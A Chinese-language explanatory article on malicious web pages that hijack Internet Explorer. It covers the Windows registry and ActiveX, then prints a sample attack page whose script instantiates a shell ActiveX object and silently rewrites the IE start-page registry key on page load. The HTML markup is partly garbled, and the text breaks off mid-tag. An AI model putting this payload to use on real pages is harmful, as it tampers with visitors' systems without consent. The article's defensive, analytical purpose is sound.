深入剖析恶意攻击性网页.doc

深入剖析恶意攻击性网页 ??? 最近越来越多的个人网站都采用了恶意攻击性网页，从开始的只是修改IE首页地址，强迫大家一打开IE就进入他的主页来提高主页访问量，愈演愈烈，到最后发展到锁定IE部分功能阻止用户恢复，甚至有的网页浏览后造成系统崩溃、数据丢失！对于此种用心险恶的途径，以经到了让人发指的地步，为了增强大家上网安全，今天我们来深入剖析一下这些阴险网页的工作原理和应采取的预防措施。 首先，我们来了解一下Windows中注册表的概念。???? 在计算机操作系统中都可以由用户按照各自的要求及硬件性能对计算机系统的硬件和软件进行各种各样的配置，这些配置参数就是配置文件，如在DOS中的Config.sys文件。在早期的Win3.x中，对软硬件的配置参数是在扩展名为.ini的文件中存放的，但微软设计时考虑不足造成了每种设备或应用程序都有自己的INI文件，使管理及通用性都难以处理。因此在Windows 95开始后继版本中，将各种软、硬件的有关配置和状态信息；用程序和资源管理器外壳的初始条件、首选项和卸载数据；算机的整个系统的设置和各种许可，文件扩展名与应用程序的关联， 硬件的描述、状态和属性；计算机性能纪录和底层的系统状态信息，以及各类其他数据存储在一起，形成一个庞大的数据库来统一进行管理，这就是Windows的注册表(Registry)。???? Windows提供了注册表编辑器（REGEDIT.EXE）和注册表文件（.reg）引入等方法来修改注册表配置，如果我们修改了注册表中的配置参数（各级子关键字的“键值”），就会改变系统工作状态，可以使系统优化，工作得更好更快，也可以略有不慎使系统出错、崩溃造成不能使用，所以不提倡对系统配置不熟悉的人随便对注册表进行修改！?恶意攻击性网页正是自动修改了浏览该网页的电脑的注册表，从而达到修改IE首页地址、锁定部分功能等的阴险目的。但是它又是如何能在我们浏览该网页的瞬间，悄悄地修改了注册表的呢？我们还得了解一下微软的ActiveX技术。??? ActiveX是Microsoft提出的一组使用COM（Component Object Model，部件对象模型）使得软件部件在网络环境中进行交互的技术集。它与具体的编程语言无关。作为针对Internet应用开发的技术，ActiveX被广泛应用于WEB服务器以及客户端的各个方面。同样ActiveX可以应用于网页编制语言中，利用JavaScript语句轻易就可以把ActiveX嵌入到Web页面中。目前，很多第三方开发商编制了各式各样的ActiveX控制。在Internet上，有超过1000个ActiveX控件供用户下载使用。在WINDOWS的SYSTEM目录下，保存有很多Window提供的ActiveX控件。??? 考虑到WEB的安全性，为了在服务器与客户端建立良好的信任关系，必须为每个在WEB上使用ActiveX控制设置一个“代码签名”（Code Signing），VC5.0提供了生成供测试用的“代码签名”的工具。如果要正式发布，则必须向有关机构申请。但又由于“代码签名”技术的不成熟，造就了阴恶的攻击性代码也可以找到一个“代码签名”顺利进行攻击，修改注册表！看，我们就是这样被微软的不成熟技术暗算了！?下面我们来剖析一个简单的攻击性网页源代码：?html?head?title攻击性网页/title?/head?body?!--上面是最基本的网页文件头--?script?document.write(APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent/APPLET);?!--用JavaScript语句调用ActiveX--?function f( )?{?!--把下面的攻击性代码定义为一个函数f --?a1=document.applets[0];?a1.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B});?!--ActiveX的一个合法代码签名--?a1.createInstance();?Shl = a1.GetObject();?Shl.RegWrite (HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page, );?!--修改注册表，把你的IE首页改成我的网站--?}?function init( )?{?setTimeout(f( ), 1000);?}?init( );?!--实现打开页面后1秒钟内执行修改注册表的工作 --?/script?!—下面为网页显示文字部分 --?p